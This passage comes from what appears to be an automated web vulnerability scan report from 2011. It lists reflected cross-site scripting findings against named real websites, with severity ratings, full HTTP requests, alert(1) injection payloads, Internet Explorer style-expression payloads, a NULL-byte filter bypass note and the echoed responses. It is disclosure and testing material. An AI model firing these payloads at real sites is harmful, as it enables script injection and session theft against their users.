Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/d5587"-alert(1)-"21beff286f3 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95813

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/d5587"-alert(1)-"21beff286f3";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.36. http://www.classesandcareers.com/schooldegrees/fusion.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classesandcareers.com
Path:   /schooldegrees/fusion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee0aa"><script>alert(1)</script>3a9f1f2068e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /schooldegrees/fusion.php?ee0aa"><script>alert(1)</script>3a9f1f2068e=1 HTTP/1.1
Host: www.classesandcareers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fhlpo5j0k74fnmkurmqel3bnq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23746

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>


<!-- Google Website Optimizer Control Script -->
<script>

...[SNIP]...
<input type="hidden" name="ee0aa"><script>alert(1)</script>3a9f1f2068e" value="1" />
...[SNIP]...

6.37. http://www.naukri.com/tieups/tieups.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naukri.com
Path:   /tieups/tieups.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75e79"><script>alert(1)</script>33f4ea0dd83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tieups/tieups.php?othersrcp=5424&id=&75e79"><script>alert(1)</script>33f4ea0dd83=1 HTTP/1.1
Host: www.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; _nkjs=0.52285400+1305381509380163; __utmz=266160400.1305381512.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=266160400.327843968.1305381512.1305381512.1305381512.1; __utmc=266160400; __utmb=266160400.2.10.1305381512

Response

HTTP/1.1 200 OK
Server: NWS/1.0
X-Powered-By: PHP/5.2.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 160
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:11 GMT
Connection: close
Set-Cookie: HitsFromTieup=5424; expires=Sat, 14-May-2011 14:19:11 GMT; path=/; domain=.naukri.com
Set-Cookie: wExp=N; expires=Sat, 14-May-2011 14:19:11 GMT; path=/; domain=.naukri.com
Set-Cookie: TieupFromTMS=10; expires=Sat, 14-May-2011 14:29:11 GMT; path=/; domain=.naukri.com

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://my.naukri.com/manager/createacc2.php?othersrcp=5424&wExp=N&id=&75e79"><script>alert(1)</script>33f4ea0dd83=1">

6.38. http://www.policybazaar.com/Default.aspx [__CALLBACKID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.policybazaar.com
Path:   /Default.aspx

Issue detail

The value of the __CALLBACKID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f17c6'%3balert(1)//5d0669ab4e was submitted in the __CALLBACKID parameter. This input was echoed as f17c6';alert(1)//5d0669ab4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /Default.aspx HTTP/1.1
Host: www.policybazaar.com
Proxy-Connection: keep-alive
Referer: http://www.policybazaar.com/
Content-Length: 3858
Origin: http://www.policybazaar.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=srwt14bcebnz0keia3ex2fnn; __utmz=67090863.1305381458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=67090863.168103630.1305381458.1305381458.1305381458.1; __utmc=67090863; __utmb=67090863.1.10.1305381458

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwNDQ1OTA4ODMPZBYCZg9kFgJmD2QWAgIBDxYCHgZvbmxvYWQFWW1lbnVfZW5hYmxlKCk7Z2V0QWN0aXZlTGF5ZXIoKTtwcmVwYXJlSW5wdXRzRm9ySGludHMoKTtnZXRBY3RpdmVTdWJNZW
...[SNIP]...
OmJsb2NrO2QCCQ9kFgJmD2QWAmYPZBYCAgEPDxYCHgdWaXNpYmxlZ2RkZA%3D%3D&=&ctl00%24ctl00%24RightBanner%24RightNavControl%24hdnfldHtmlTableForRightbanner=&__CALLBACKID=ctl00%24ctl00%24MainContent%24DefaultFormf17c6'%3balert(1)//5d0669ab4e&__CALLBACKPARAM=CallNews&__EVENTVALIDATION=%2FwEWAgK61fyWDgLgh%2FiIDA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:03:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 156

eThe target 'ctl00$ctl00$MainContent$DefaultFormf17c6';alert(1)//5d0669ab4e' for the callback could not be found or did not implement ICallbackEventHandler.

6.39. http://www.quarles.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quarles.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e1b4'-alert(1)-'5d5a879e026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3e1b4'-alert(1)-'5d5a879e026=1 HTTP/1.1
Host: www.quarles.com
Proxy-Connection: keep-alive
Referer: http://www.quarles.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1036; PortletId=701; SiteId=1035; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=5ryguaijsygcdw45f41m3155; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1034&RootPortletID=614&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; NSC_QPE-FHB5152-Tibsfe=ffffffff09d5f62e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 11:26:20 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible:IE=EmulateIE7
x-geoloc:02
x-client:000912
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:04
x-server:EG-HUBRD-A52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1036; path=/
Set-Cookie: PortletId=701; path=/
Set-Cookie: SiteId=1035; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 34317
Content-Length: 34317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>
           Quarles & Brady LLP
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
...[SNIP]...
<script language="javascript">
function printDocument() {
   var sUrl = 'http://www.quarles.com/?3e1b4'-alert(1)-'5d5a879e026=1&print=true';
   var oDoc = window.open(sUrl, "print");
}
</script>
...[SNIP]...

6.40. http://www.quora.com/up/tchannel4/updates [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /up/tchannel4/updates

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 48973<script>alert(1)</script>39ec8f66e90 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /up/tchannel4/updates?min_seq=7021982&channel=main-w-dep9-2162319527561981685&timeout=2000&callback=jsonp12ff361b2da9689beda48973<script>alert(1)</script>39ec8f66e90 HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
Referer: http://www.quora.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); m-s=elrhGUM55MQtNfHFxEBqeA==; m-tz=300; __utmv=; __utma=261736717.2135279484.1305305580.1305305580.1305458355.2; __utmc=261736717; __utmb=261736717.1.10.1305458355

Response

HTTP/1.1 200 OK
Content-Length: 103
Etag: "5ad7c3ab1b25c03e2e39fa371b75ce0b6c6b54d1"
Content-Type: text/javascript; charset=UTF-8
Server: TornadoServer/1.2.1

jsonp12ff361b2da9689beda48973<script>alert(1)</script>39ec8f66e90({"messages": [], "min_seq": 7022611})

6.41. http://www.stowetoday.com/search/opensearch/generic.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stowetoday.com
Path:   /search/opensearch/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5245c"style%3d"x%3aexpression(alert(1))"443bfa630be was submitted in the REST URL parameter 2. This input was echoed as 5245c"style="x:expression(alert(1))"443bfa630be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/opensearch5245c"style%3d"x%3aexpression(alert(1))"443bfa630be/generic.xml HTTP/1.1
Host: www.stowetoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=235831491.1305412146.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=e3e1df2-12ff0a09dd3-63d2808d-1; __utma=235831491.1676825239.1305412146.1305412146.1305412146.1; __utmc=235831491; __utmb=235831491.2.10.1305412146

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2825420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:23 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2225
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: stowetoday.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 38831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form method="get" action="/search/opensearch5245c"style="x:expression(alert(1))"443bfa630be/generic.xml">
...[SNIP]...

6.42. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews.com
Path:   /shared-content/e-edition/display.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c1e"style%3d"x%3aexpression(alert(1))"22493627c80 was submitted in the pub parameter. This input was echoed as 21c1e"style="x:expression(alert(1))"22493627c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shared-content/e-edition/display.php?pubdate=2010-09-01&page=A1&pub=21c1e"style%3d"x%3aexpression(alert(1))"22493627c80 HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Referer: http://www.townnews.com/shared-content/e-edition/menu.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; PHPSESSID=c3c252a7ad706c2168a0b2594434613a

Response

HTTP/1.1 200 OK
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:35:08 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
X-PHP-Engine: enabled
Real-Hostname: townnews.com
Content-Length: 334

<frameset rows="*,20" cols="*" frameborder="0">
<frame name="e-edition-archive" src="/content/e-edition/2010/09/01/21c1e"style="x:expression(alert(1))"22493627c80/A1.pdf" marginheight="0" marginwidth="0">
...[SNIP]...

6.43. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews.com
Path:   /shared-content/e-edition/display.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91f3"style%3d"x%3aexpression(alert(1))"c4f8fb3cf8b was submitted in the pub parameter. This input was echoed as f91f3"style="x:expression(alert(1))"c4f8fb3cf8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /shared-content/e-edition/display.php?pubdate=2010-09-01&page=A1&pub=f91f3"style%3d"x%3aexpression(alert(1))"c4f8fb3cf8b HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Referer: http://www.townnews.com/shared-content/e-edition/menu.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; PHPSESSID=c3c252a7ad706c2168a0b2594434613a

Response

HTTP/1.1 200 OK
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:06 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
X-PHP-Engine: enabled
Real-Hostname: townnews.com
Content-Length: 334

<frameset rows="*,20" cols="*" frameborder="0">
<frame name="e-edition-archive" src="/content/e-edition/2010/09/01/f91f3"style="x:expression(alert(1))"c4f8fb3cf8b/A1.pdf" marginheight="0" marginwidth="0">
...[SNIP]...

6.44. http://www.townnews365.com/search/opensearch/generic.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /search/opensearch/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4978"style%3d"x%3aexpression(alert(1))"e2eeb644230 was submitted in the REST URL parameter 2. This input was echoed as c4978"style="x:expression(alert(1))"e2eeb644230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/opensearchc4978"style%3d"x%3aexpression(alert(1))"e2eeb644230/generic.xml HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3837396
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:49 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3249
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 39118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...
<form method="get" action="/search/opensearchc4978"style="x:expression(alert(1))"e2eeb644230/generic.xml">
...[SNIP]...

6.45. http://www.townnews365.com/search/results/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /search/results/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a33"style%3d"x%3aexpression(alert(1))"aead80cd8e9 was submitted in the REST URL parameter 2. This input was echoed as 53a33"style="x:expression(alert(1))"aead80cd8e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/results53a33"style%3d"x%3aexpression(alert(1))"aead80cd8e9/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3838756
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:46:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4939
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 39024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...
<form method="get" action="/search/results53a33"style="x:expression(alert(1))"aead80cd8e9/">
...[SNIP]...

6.46. http://www.townnews365.com/users/login/ [referer_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/login/

Issue detail

The value of the referer_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3d18'%3balert(1)//60272508631 was submitted in the referer_url parameter. This input was echoed as a3d18';alert(1)//60272508631 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/login/?referer_url=/user-generated_solutions/user_account_contributions/a3d18'%3balert(1)//60272508631 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4014240
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:32:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4056
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 38695


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<input type="hidden" name="referer_url" value="/user-generated_solutions/user_account_contributions/a3d18';alert(1)//60272508631?login_success=true" />
...[SNIP]...

6.47. http://www.townnews365.com/users/login/ [referer_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/login/

Issue detail

The value of the referer_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1970"style%3d"x%3aexpression(alert(1))"19ba92e4f1b was submitted in the referer_url parameter. This input was echoed as c1970"style="x:expression(alert(1))"19ba92e4f1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /users/login/?referer_url=/user-generated_solutions/user_account_contributions/c1970"style%3d"x%3aexpression(alert(1))"19ba92e4f1b HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4014328
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:32:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4074
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 38752


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<a class="signup-link" href="https://townnews365-dot-com.bloxcms.com/users/signup/?referer_url=/user-generated_solutions/user_account_contributions/c1970"style="x:expression(alert(1))"19ba92e4f1b">
...[SNIP]...

6.48. http://www.vccircle.com/news/startups [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vccircle.com
Path:   /news/startups

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40204"><script>alert(1)</script>60021ff941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/startups?40204"><script>alert(1)</script>60021ff941=1 HTTP/1.1
Host: www.vccircle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
